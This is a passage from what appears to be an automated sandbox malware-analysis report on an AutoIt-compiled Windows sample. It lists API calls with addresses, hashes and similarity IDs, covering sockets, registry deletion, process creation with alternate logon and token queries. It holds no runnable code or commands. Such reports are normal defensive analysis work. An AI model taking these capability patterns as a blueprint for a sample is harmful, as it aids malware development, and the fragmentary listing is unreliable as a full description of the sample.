                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 1377345388-1173974218
                                                                                                                    • Opcode ID: d76fdb4df304f9b972db13b14f3364857fd0242e514693a9dc53ff63b59b4a29
                                                                                                                    • Instruction ID: aeb13f1775ae2cc5220781c7f8a4a394b10f7c21369987418016a54db915f260
                                                                                                                    • Opcode Fuzzy Hash: d76fdb4df304f9b972db13b14f3364857fd0242e514693a9dc53ff63b59b4a29
                                                                                                                    • Instruction Fuzzy Hash: 6141AE71508344AEC757EF64C481ADFB7ECAF89780F0008AEF49ACB251EA34D689C752
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 003A72AA
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A7351
                                                                                                                    • IsMenu.USER32(?), ref: 003A7369
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003A73B1
                                                                                                                    • DrawMenuBar.USER32 ref: 003A73C4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 3866635326-4108050209
                                                                                                                    • Opcode ID: cfc31bbe12093e87bf27c548a1e11a33a962f879cef4ebbbf38f340a763cf1f1
                                                                                                                    • Instruction ID: 92a2928bac229527c62d2ddf514476804e95e893a19a2373cbf88e57f3d8dec9
                                                                                                                    • Opcode Fuzzy Hash: cfc31bbe12093e87bf27c548a1e11a33a962f879cef4ebbbf38f340a763cf1f1
                                                                                                                    • Instruction Fuzzy Hash: 75412779A04208EFDF21DF50D884A9ABBF8FF06314F168529FD15AB290D730AD54DB90
                                                                                                                    APIs
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 003A0FD4
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A0FFE
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 003A10B5
                                                                                                                      • Part of subcall function 003A0FA5: RegCloseKey.ADVAPI32(?), ref: 003A101B
                                                                                                                      • Part of subcall function 003A0FA5: FreeLibrary.KERNEL32(?), ref: 003A106D
                                                                                                                      • Part of subcall function 003A0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003A1090
                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 003A1058
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 395352322-0
                                                                                                                    • Opcode ID: 5319aebb781b1ca0d9ad5b7d314ab57fcf7af2a35f89ef200ecf07b38aa7ee66
                                                                                                                    • Instruction ID: b3b7642f8854f147fa5916685a828a751b85e86a20d00472a68c7de57ca411be
                                                                                                                    • Opcode Fuzzy Hash: 5319aebb781b1ca0d9ad5b7d314ab57fcf7af2a35f89ef200ecf07b38aa7ee66
                                                                                                                    • Instruction Fuzzy Hash: 4931EDB1901109BFDB16DF90DC89EFFB7BCEF0A350F000169E511E2151EA749E899AA4
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003A62EC
                                                                                                                    • GetWindowLongW.USER32(011B58C8,000000F0), ref: 003A631F
                                                                                                                    • GetWindowLongW.USER32(011B58C8,000000F0), ref: 003A6354
                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003A6386
                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003A63B0
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003A63C1
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003A63DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2178440468-0
                                                                                                                    • Opcode ID: 68eab3b778820fd724170e52168e56065bf6387348616d71c44cc25ae431c437
                                                                                                                    • Instruction ID: 5572b0bdbecdfcad59e13b0bcd26378d41911ec39d3ae70cd4b952d2358857fe
                                                                                                                    • Opcode Fuzzy Hash: 68eab3b778820fd724170e52168e56065bf6387348616d71c44cc25ae431c437
                                                                                                                    • Instruction Fuzzy Hash: DE310238640290EFDB22CF58DC86F5937E9FB4A714F1A42A8F5518F2F2CB71A8419B50
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0037DB2E
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0037DB54
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0037DB57
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0037DB75
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0037DB7E
                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0037DBA3
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0037DBB1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761583154-0
                                                                                                                    • Opcode ID: 933beddae142126d248edc7091d942987e5b35604cc969a25e897d99c490b967
                                                                                                                    • Instruction ID: cadfa88438bbd9e370d27f409e197a0ed47778fb460a8d0c710429563c17c11d
                                                                                                                    • Opcode Fuzzy Hash: 933beddae142126d248edc7091d942987e5b35604cc969a25e897d99c490b967
                                                                                                                    • Instruction Fuzzy Hash: 49219236600219AFDF21DFB9DC88CBB73BCEF0A360B018525FA18DB250D6749C418BA4
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00397D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00397DB6
                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003961C6
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003961D5
                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0039620E
                                                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00396217
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00396221
                                                                                                                    • closesocket.WSOCK32(00000000), ref: 0039624A
                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00396263
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 910771015-0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0037DC09
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0037DC2F
• SysAllocString.OLEAUT32(00000000), ref: 0037DC32
• SysAllocString.OLEAUT32 ref: 0037DC53
• SysFreeString.OLEAUT32 ref: 0037DC5C
• StringFromGUID2.OLE32(?,?,00000028), ref: 0037DC76
• SysAllocString.OLEAUT32(?), ref: 0037DC84
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
  • Part of subcall function 00321D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00321D73
  • Part of subcall function 00321D35: GetStockObject.GDI32(00000011), ref: 00321D87
  • Part of subcall function 00321D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00321D91
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003A7632
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003A763F
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003A764A
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003A7659
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003A7665
Strings
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
APIs
• __init_pointers.LIBCMT ref: 00349AE6
  • Part of subcall function 00343187: EncodePointer.KERNEL32(00000000), ref: 0034318A
  • Part of subcall function 00343187: __initp_misc_winsig.LIBCMT ref: 003431A5
  • Part of subcall function 00343187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00349EA0
  • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00349EB4
  • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00349EC7
  • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00349EDA
  • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00349EED
  • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00349F00
  • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00349F13
  • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00349F26
  • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00349F39
  • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00349F4C
  • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00349F5F
  • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00349F72
  • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00349F85
  • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00349F98
  • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00349FAB
  • Part of subcall function 00343187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00349FBE
• __mtinitlocks.LIBCMT ref: 00349AEB
• __mtterm.LIBCMT ref: 00349AF4
  • Part of subcall function 00349B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00349AF9,00347CD0,003DA0B8,00000014), ref: 00349C56
  • Part of subcall function 00349B5C: _free.LIBCMT ref: 00349C5D
  • Part of subcall function 00349B5C: DeleteCriticalSection.KERNEL32(02>,?,?,00349AF9,00347CD0,003DA0B8,00000014), ref: 00349C7F
• __calloc_crt.LIBCMT ref: 00349B19
• __initptd.LIBCMT ref: 00349B3B
• GetCurrentThreadId.KERNEL32 ref: 00349B42
Similarity
• API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
• String ID:
• API String ID: 3567560977-0
APIs
• _memset.LIBCMT ref: 003AB644
• _memset.LIBCMT ref: 003AB653
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003E6F20,003E6F64), ref: 003AB682
• CloseHandle.KERNEL32 ref: 003AB694
Strings
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID: o>$do>
• API String ID: 3277943733-4142427356
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00343F85), ref: 00344085
• GetProcAddress.KERNEL32(00000000), ref: 0034408C
• EncodePointer.KERNEL32(00000000), ref: 00344097
• DecodePointer.KERNEL32(00343F85), ref: 003440B2
Strings
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3253778849-0
APIs
  • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
  • Part of subcall function 003A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039FDAD,?,?), ref: 003A0E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A02BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A02FD
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003A0320
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003A0349
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 003A038C
• RegCloseKey.ADVAPI32(00000000), ref: 003A0399
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
APIs
• GetMenu.USER32(?), ref: 003A57FB
• GetMenuItemCount.USER32(00000000), ref: 003A5832
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003A585A
• GetMenuItemID.USER32(?,?), ref: 003A58C9
• GetSubMenu.USER32(?,?), ref: 003A58D7
• PostMessageW.USER32(?,00000111,?,00000000), ref: 003A5928
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
APIs
• VariantInit.OLEAUT32(?), ref: 0037EF06
• VariantClear.OLEAUT32(00000013), ref: 0037EF78
• VariantClear.OLEAUT32(00000000), ref: 0037EFD3
• _memmove.LIBCMT ref: 0037EFFD
• VariantClear.OLEAUT32(?), ref: 0037F04A
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0037F078
Similarity
• API ID: Variant$Clear$ChangeInitType_memmove
• String ID:
• API String ID: 1101466143-0
APIs
• _memset.LIBCMT ref: 00382258
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003822A3
• IsMenu.USER32(00000000), ref: 003822C3
• CreatePopupMenu.USER32 ref: 003822F7
• GetMenuItemCount.USER32(000000FF), ref: 00382355
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00382386
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
APIs
  • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
• BeginPaint.USER32(?,?,?,?,?,?), ref: 0032179A
• GetWindowRect.USER32(?,?), ref: 003217FE
• ScreenToClient.USER32(?,?), ref: 0032181B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0032182C
• EndPaint.USER32(?,?), ref: 00321876
Similarity
• API ID: PaintWindow$BeginClientLongRectScreenViewport
• String ID:
• API String ID: 1827037458-0
APIs
• ShowWindow.USER32(003E57B0,00000000,011B58C8,?,?,003E57B0,?,003AB5A8,?,?), ref: 003AB712
• EnableWindow.USER32(00000000,00000000), ref: 003AB736
• ShowWindow.USER32(003E57B0,00000000,011B58C8,?,?,003E57B0,?,003AB5A8,?,?), ref: 003AB796
• ShowWindow.USER32(00000000,00000004,?,003AB5A8,?,?), ref: 003AB7A8
• EnableWindow.USER32(00000000,00000001), ref: 003AB7CC
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 003AB7EF
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,00394E41,?,?,00000000,00000001), ref: 003970AC
  • Part of subcall function 003939A0: GetWindowRect.USER32(?,?), ref: 003939B3
• GetDesktopWindow.USER32 ref: 003970D6
• GetWindowRect.USER32(00000000), ref: 003970DD
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0039710F
  • Part of subcall function 00385244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003852BC
• GetCursorPos.USER32(?), ref: 0039713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00397199
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4137160315-0
                                                                                                                    • Opcode ID: bedca261c24cc08984a3783b8b3ed999b5a8c72e4c6447b04bffa37b6ffd1b03
                                                                                                                    • Instruction ID: dcf0aa8c30fc864628e5bc2bc346dd06d2033b08994d79d53456d7cda4c8f06c
                                                                                                                    • Opcode Fuzzy Hash: bedca261c24cc08984a3783b8b3ed999b5a8c72e4c6447b04bffa37b6ffd1b03
                                                                                                                    • Instruction Fuzzy Hash: EF31D072509305AFDB21EF54C849B9BB7EAFF89314F000929F58997191CB30EA09CB92
APIs
  • Part of subcall function 003780A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003780C0
  • Part of subcall function 003780A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003780CA
  • Part of subcall function 003780A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003780D9
  • Part of subcall function 003780A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003780E0
  • Part of subcall function 003780A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003780F6
• GetLengthSid.ADVAPI32(?,00000000,0037842F), ref: 003788CA
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 003788D6
• HeapAlloc.KERNEL32(00000000), ref: 003788DD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 003788F6
• GetProcessHeap.KERNEL32(00000000,00000000,0037842F), ref: 0037890A
• HeapFree.KERNEL32(00000000), ref: 00378911
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
• Opcode ID: d28dd7f96fa8cfeb9e3ecce4bf416fbcd08e60173c22a96ddce52b0540da4e56
• Instruction ID: 49095ae7d3a568a19f11a441aa0e772cc6eb1be1c5e1086c4bf29de29a9551e4
• Opcode Fuzzy Hash: d28dd7f96fa8cfeb9e3ecce4bf416fbcd08e60173c22a96ddce52b0540da4e56
• Instruction Fuzzy Hash: FF11B171641209FFDB229FA4DC09BBE7BACEB46311F118028E989D7110CB3A9D04DB61

APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003785E2
• OpenProcessToken.ADVAPI32(00000000), ref: 003785E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003785F8
• CloseHandle.KERNEL32(00000004), ref: 00378603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00378632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00378646
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: b85223463cbfb3b57766cca992dd3281c4bd81b8b3ea6ee6806cf4a41eb8ada6
• Instruction ID: 1373f2b8e28ed0992b70bbe455be67b5f6ce75a0d0176c1be800cb497b2461fd
• Opcode Fuzzy Hash: b85223463cbfb3b57766cca992dd3281c4bd81b8b3ea6ee6806cf4a41eb8ada6
• Instruction Fuzzy Hash: 2E115C72540209AFDF12CFA4DD49BEE7BADEF09354F058064FE04A2160C7768D60DB60

APIs
• GetDC.USER32(00000000), ref: 0037B7B5
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0037B7C6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0037B7CD
• ReleaseDC.USER32(00000000,00000000), ref: 0037B7D5
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 0037B7EC
• MulDiv.KERNEL32(000009EC,?,?), ref: 0037B7FE
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: ac1cdd7b4646380fd9707ad8488f097e50bc744d700d9e2034b8f4dd90454de1
• Instruction ID: 4d2ae90df448df9624e4bb7a1438bf5da98ec34f702dcdfb2a2ff03101e05862
• Opcode Fuzzy Hash: ac1cdd7b4646380fd9707ad8488f097e50bc744d700d9e2034b8f4dd90454de1
• Instruction Fuzzy Hash: 21017175E00209BFEB219BE69C45A5ABFB8EF49311F008065FA08A7291D6759C00CF90

APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00340193
• MapVirtualKeyW.USER32(00000010,00000000), ref: 0034019B
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 003401A6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 003401B1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 003401B9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 003401C1
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: f6981f1da07977a14441634bb327ab986735c5d39e3847d3d429374e46073269
• Instruction ID: 0d865d7287244cc266f4820fd0ffc648aeaa3a067b7328f5d3d2b9e314a471f1
• Opcode Fuzzy Hash: f6981f1da07977a14441634bb327ab986735c5d39e3847d3d429374e46073269
• Instruction Fuzzy Hash: C8016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5

APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003853F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0038540F
• GetWindowThreadProcessId.USER32(?,?), ref: 0038541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0038542D
